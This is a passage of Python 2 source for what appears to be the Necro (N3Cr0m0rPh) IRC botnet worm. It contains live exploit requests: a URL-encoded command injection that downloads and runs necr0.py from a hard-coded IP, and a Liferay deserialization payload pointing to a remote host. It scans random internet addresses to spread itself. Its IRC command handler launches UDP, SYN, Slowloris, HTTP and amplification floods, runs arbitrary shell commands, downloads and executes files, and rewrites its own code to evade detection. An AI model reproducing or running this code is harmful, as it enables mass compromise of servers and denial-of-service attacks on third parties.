                urllib2.urlopen(url+'/include/makecvs.php?Event=%60cd%20%2Ftmp%7C%7Ccd%20%24%28find%20%2F%20-writable%20%7C%20head%20-n%201%29%3Bcurl%20http%3A%2F%2F45.145.185.229%2Fnecr0.py%3Enecr0.py%3B%20php%20-r%20%22file_put_contents%28%5C%22necr0.py%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2F45.145.185.229%2Fnecr0.py%5C%22%29%29%3B%22%3B%20wget%20http%3A%2F%2F45.145.185.229%2Fnecr0.py%20-O%20necr0.py%3B%20chmod%20777%20necr0.py%3B%20.%2Fnecr0.py%20%7C%7C%20python%20necr0.py%7C%7Cpython2%20necr0.py%20%26%60')
728
            else:
729
                data = {
730
                    'columnId': '1',
731
                    'name': '2',
732
                    'type': '3',
733
                    '+defaultData': 'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource',
734
                    'defaultData.userOverridesAsString': 'HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a707070707070707070707874000a4576696c4f626a65637474001a687474703a2f2f34352e3134352e3138352e38333a383030342f740003466f6f;'
735
                }
736
                req = urllib2.Request(url+"/api/jsonws/expandocolumn/update-column", json.dumps(data), {'Content-Type': 'application/json', 'Authorization' : 'Basic dGVzdEBsaWZlcmF5LmNvbTp0ZXN0'})
737
                urllib2.urlopen(req)
738
        except Exception as e:
739
            print str(e)
740

741
    def gen_IP(self):
742
        not_valid = [10,127,169,172,192,185,233,234]
743
        first = random.randrange(1,256)
744
        while first in not_valid:
745
            first = random.randrange(1,256)
746
        ip = ".".join([str(first),str(random.randrange(1,256)),
747
        str(random.randrange(1,256)),str(random.randrange(1,256))])
748
        return ip
749

750
    def worker(self):
751
        while True:
752
            IP = self.gen_IP()
753
            try:
754
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
755
                s.settimeout(0.5)
756
                s.connect((IP, 80))
757
                s.close()
758
                self.exploit(IP, 80)
759
            except Exception as e:
760
                pass
761

762
            try:
763
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
764
                s.settimeout(0.5)
765
                s.connect((IP, 8443))
766
                s.close()
767
                self.exploit(IP, 8443)
768
            except Exception as e:
769
                pass
770

771
            try:
772
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
773
                s.settimeout(0.5)
774
                s.connect((IP, 443))
775
                s.close()
776
                self.exploit(IP, 443)
777
            except Exception as e:
778
                pass
779

780
    def INIT_IRC_CONNECTION(self):
781
        IRC_SOCK_RECV=""
782

783
        self.IRC_SOCK=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
784
        self.IRC_SOCK.connect((self.C2_SERVER, self.C2_PORT))
785
        IS_IN_SECRET_CHAN = 0
786

787
        self.IRC_SOCK.send("NICK %s\n" % self.BOT_NICK)
788
        self.IRC_SOCK.send("USER %s %s localhost :%s\n" % (self.BOT_REALNAME, self.C2_SERVER, self.rantDwWe))
789
        gaKE = 1
790
        
791
        while 1:
792
            IRC_SOCK_RECV=IRC_SOCK_RECV+self.IRC_SOCK.recv(1024)
793
            IRC_SOCK_RECV_SPLIT=split(IRC_SOCK_RECV, "\n")
794
            IRC_SOCK_RECV=IRC_SOCK_RECV_SPLIT.pop( )
795
            
796
            for self.IRC_RECV_MSG in IRC_SOCK_RECV_SPLIT:
797
                self.IRC_RECV_MSG=rstrip(self.IRC_RECV_MSG)
798
                self.IRC_RECV_MSG=split(self.IRC_RECV_MSG)
799
                
800
                if(self.IRC_RECV_MSG[0]=="PING"):
801
                    self.IRC_SOCK.send("PONG %s\n" % self.IRC_RECV_MSG[1])
802
                
803
                elif(self.IRC_RECV_MSG[1]=="376" or self.IRC_RECV_MSG[1]=="422" or self.IRC_RECV_MSG[1]=="352"):
804
                    if IS_IN_SECRET_CHAN == 0:
805
                        self.IRC_SOCK.send("JOIN %s %s\n" % (self.C2_CHAN,self.C2_CHAN_KEY))
806
                        IS_IN_SECRET_CHAN = 1
807
                
808
                elif(self.IRC_RECV_MSG[1]=="433"):
809
                    self.BOT_NICK="[N3Cr0m0rPh]"+str(self.randStr)
810
                    self.IRC_SOCK.send("NICK %s\n" % self.BOT_NICK)
811
            try:
812
                
813
                if self.IRC_RECV_MSG[3]==":ddos.udpflood":
814
                    self.IRC_SOCK.send("PRIVMSG %s :Started UDP flood on %s:%s\n" % (self.C2_CHAN,self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[5]))
815
                    threading.Thread(target=self.Do_UDP_Flood,args=(self.IRC_RECV_MSG[4],int(self.IRC_RECV_MSG[5]),int(self.IRC_RECV_MSG[6]),)).start()
816
                
817
                elif self.IRC_RECV_MSG[3]==":ddos.synflood":
818
                    self.IRC_SOCK.send("PRIVMSG %s :Started SYN flood on %s:%s with %s threads\n" % (self.C2_CHAN,self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[5],self.IRC_RECV_MSG[7]))
819
                    for i in range(0, int(self.IRC_RECV_MSG[7])):
820
                        threading.Thread(target=self.Do_SYN_Flood,args=(self.IRC_RECV_MSG[4],int(self.IRC_RECV_MSG[5]),int(self.IRC_RECV_MSG[6],))).start()
821
                
822
                elif self.IRC_RECV_MSG[3]==":ddos.slowloris":
823
                    self.IRC_SOCK.send("PRIVMSG %s :Started Slowloris on %s with %s sockets\n" % (self.C2_CHAN,self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[5]))
824
                    threading.Thread(target=self.Do_Slowloris_Flood,args=(self.IRC_RECV_MSG[4],int(self.IRC_RECV_MSG[5]),int(self.IRC_RECV_MSG[6],))).start()
825
                
826
                elif self.IRC_RECV_MSG[3]==":ddos.httpflood":
827
                    self.IRC_SOCK.send("PRIVMSG %s :Started HTTP flood on URL: %s with %s threads\n" % (self.C2_CHAN,self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[7]))
828
                    for i in range(0, int(self.IRC_RECV_MSG[7])):
829
                        threading.Thread(target=self.Do_HTTP_Flood,args=(self.IRC_RECV_MSG[4],int(self.IRC_RECV_MSG[5]),self.IRC_RECV_MSG[6],)).start()
830
                
831
                elif self.IRC_RECV_MSG[3]==":ddos.loadamp":
832
                    self.IRC_SOCK.send("PRIVMSG %s :Downloading %s list from %s\n" % (self.C2_CHAN,self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[5]))
833
                    urllib.urlretrieve(self.IRC_RECV_MSG[5], "."+self.IRC_RECV_MSG[4])
834

835
                elif self.IRC_RECV_MSG[3]==":ddos.amp":
836
                    try:
837

838
                        if not os.path.exists("."+self.IRC_RECV_MSG[4]):
839
                            self.IRC_SOCK.send("PRIVMSG %s :Please load this type of amp list first.\n" % (self.C2_CHAN))
840
                            continue
841
                        domains="netflix.com,youtube.com,facebook.com,google.com,yahoo.com".split(",")
842

843
                        proto = self.IRC_RECV_MSG[4]
844
                        if self.IRC_RECV_MSG[4] == "dns":
845
                            try:
846
                                domains = self.IRC_RECV_MSG[8].split(",")
847
                            except:
848
                                pass
849
                        files[self.IRC_RECV_MSG[4]] = ["."+self.IRC_RECV_MSG[4]]
850

851
                        self.IRC_SOCK.send("PRIVMSG %s :Started %s amp flood on %s\n" % (self.C2_CHAN,self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[5]))
852
                        self.DDoS(socket.gethostbyname(self.IRC_RECV_MSG[5]), int(self.IRC_RECV_MSG[6]), domains, int(self.IRC_RECV_MSG[7]))
853
                    
854
                    except Exception as e:
855
                        print(str(e))
856

857
                elif self.IRC_RECV_MSG[3]==":bot.scannetrange":
858
                    threading.Thread(target=self.RANGE_SCAN,args=(self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[5],self.IRC_RECV_MSG[6],)).start()
859

860
                elif self.IRC_RECV_MSG[3]==":bot.shell":
861
                    try:
862
                            N3CTR0_SHELL = subprocess.Popen(self.IRC_RECV_MSG[4:],stdout=subprocess.PIPE)
863
                            for response in iter(N3CTR0_SHELL.stdout.readline,''):
864
                                    self.IRC_SOCK.send("PRIVMSG %s :%s\n" % (self.C2_CHAN,response))
865
                    except:
866
                            self.IRC_SOCK.send("PRIVMSG %s :Failed to execute command.\n" % self.C2_CHAN)
867
                elif self.IRC_RECV_MSG[3]==":bot.repack":
868
                    self.REWRITE_SELF()
869
                    self.IRC_SOCK.send("PRIVMSG %s :Repacked code!\n" % (self.C2_CHAN))
870

871
                elif self.IRC_RECV_MSG[3]==":http.download":
872
                    try:
873
                        urllib.urlretrieve(self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[5])
874
                        self.IRC_SOCK.send("PRIVMSG %s :Downloaded.\n" % (self.C2_CHAN))
875
                    except:
876
                        self.IRC_SOCK.send("PRIVMSG %s :Could not download!\n" % (self.C2_CHAN))
877

878
                elif self.IRC_RECV_MSG[3]==":http.execute":
879
                    try:
880
                        urllib.urlretrieve(self.IRC_RECV_MSG[4],self.IRC_RECV_MSG[5])
881
                        if not platform.System.startswith("Windows"):
882
                            try:
883
                                os.chmod(self.IRC_RECV_MSG[5], 0777)
884
                            except:
885
                                pass
886
                        subprocess.Popen([("%s" % self.IRC_RECV_MSG[5])])
887
                        self.IRC_SOCK.send("PRIVMSG %s :Downloaded and executed.\n" % (self.C2_CHAN))
888
                    except:
889
                        self.IRC_SOCK.send("PRIVMSG %s :Could not download or execute!\n" % (self.C2_CHAN))
890

891
                elif self.IRC_RECV_MSG[3]==":bot.reset":
892
                    self.INSTALL_FEATURES()
893

894
                elif self.IRC_RECV_MSG[3]==":bot.move":
895
                    self.C2_SERVER=self.IRC_RECV_MSG[4] #Server
896
                    self.C2_CHAN=self.IRC_RECV_MSG[5] #Channel
897
                    self.C2_CHAN_KEY=self.IRC_RECV_MSG[6] #Channel key
898
                    
899
                    while 1:
900
                        try:
901
                            self.INSTALL_FEATURES()
902
                        except:
903
                            pass
904

905
                elif self.IRC_RECV_MSG[3]==":bot.killbyname":
906
                    os.popen("pkill -f %s" % self.IRC_RECV_MSG[4])
907
                    self.IRC_SOCK.send("PRIVMSG %s :Killed.\n" % (self.C2_CHAN))
908

909
                elif self.IRC_RECV_MSG[3]==":bot.killbypid":
910
                    os.kill(int(self.IRC_RECV_MSG[4]),9)
911
                    self.IRC_SOCK.send("PRIVMSG %s :Killed.\n" % (self.C2_CHAN))
912

913
                elif self.IRC_RECV_MSG[3]==":threads.end":
914
                    self.KILL_THREADS=1
915

916
                elif self.IRC_RECV_MSG[3]==":threads.begin":
917
                    self.KILL_THREADS=0
918

919
                elif self.IRC_RECV_MSG[3]==":sniff.start":
920
                    pause=0
921

922
                elif self.IRC_RECV_MSG[3]==":sniff.pause":
923
                    pause=1
924

925
                elif self.IRC_RECV_MSG[3]==":bot.getip":
926
                    self.IRC_SOCK.send("PRIVMSG %s :%s\n" % (self.C2_CHAN,urllib2.urlopen("https://api.ipify.org").read()))
927

928
                elif self.IRC_RECV_MSG[3]==":bot.ram":
929
                    meminfo = dict((i.split()[0].rstrip(':'),int(i.split()[1])) for i in open('/proc/meminfo').readlines())
930
                    mem_kib = meminfo['MemTotal']  # e.g. 3921852
931
                    self.IRC_SOCK.send("PRIVMSG %s :%s MB RAM total.\n" % (self.C2_CHAN, mem_kib / 1024))
932

933
                elif self.IRC_RECV_MSG[3]==":bot.killmyeyepeeusinghoic":
934
                   os.kill(os.getpid(),9)
935

936
            except IndexError or TypeError:
937
                pass
938

939
    def REWRITE_SELF(self):
940
        SELF_FILE=open(argv[0],"r")
941
        SELF_LINES=SELF_FILE.read()
942
        SELF_FILE.close()
943
        
944
        POLY_STRINGS=['rantDwWe','GIVE_RAND_STR','GIVE_RAND_STR','INIT_CONNECTION','INIT_IRC_CONNECTION','C2_PORT','Do_Slowloris_Flood','GET_ABSOLUTE_PATH','INSTALL_FEATURES','MBPS_SENT','MB_SENT','Do_UDP_Flood','BOT_REALNAME','C2_SERVER','OMpLRZVt','randStr','C2_CHAN','SENT','BOT_NICK','POLY_STRINGS','POLY_STRING','SELF_FILE','SELF_FILE_FINISHED','WxbKsWDa','REWRITE_SELF','Do_SYN_Flood','UDP_SOCK','IRC_SOCK','ATTACK_END','TARGET_PORT','ATTACK_END','ATTACK_TIME','TARGET_IP','IRC_SOCK_RECV_SPLIT','C2_CHAN_KEY','SELF_LINES','IRC_SOCK_RECV','MbEjgUOl','RECURSIVE_URL','len','eiaAnsBP','UDP_DATA','YZZEVzDy','OPEN_URL','url','sZSansOC','iKdvMuag','dodepTmF','QwAdOdJR','ncBrnXua','GxVCceRN','qRtXeNct','FocihdJO','TARGET','Do_HTTP_Flood','RANGE_SCAN','RANGE','OlxRQoIE','IRC_RECV_MSG','N3CTR0_SHELL','response','_','qSPBJJom','kwXLnXMT','KBrVuXmb','RyoybtRY','fNMASlgn','OQEPVvYq','WGpaXGEC','FvHHzlJu','MiwRFOVd','dLgrNjvV','RyoybtRY','HrkOVUQn', 'OmgjPABz', 'IS_IN_SECRET_CHAN', 'GET_HEADER', 'PuaorNVt', 'HEADER','sock', 'KgaiiMDa']
945
        for POLY_STRING in POLY_STRINGS:
946
            SELF_LINES=SELF_LINES.replace(POLY_STRING,self.GIVE_RAND_STR(8))
947
        
948
        SELF_FILE_FINISHED=open(argv[0],"w")
949
        SELF_FILE_FINISHED.write(SELF_LINES)
950
        SELF_FILE_FINISHED.close()
951

952
if __name__=="__main__":
953
    pid_file = 'SDKOEF'
954
    fp = open(pid_file, 'w')
955
    try:
956
        fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
957
        while 1:
958
            try:
959
                INIT_CONNECTION()
960
            except Exception as e:
961
                print(str(e))
962
                time.sleep(45)
963
    except IOError:
964
        exit(1)
965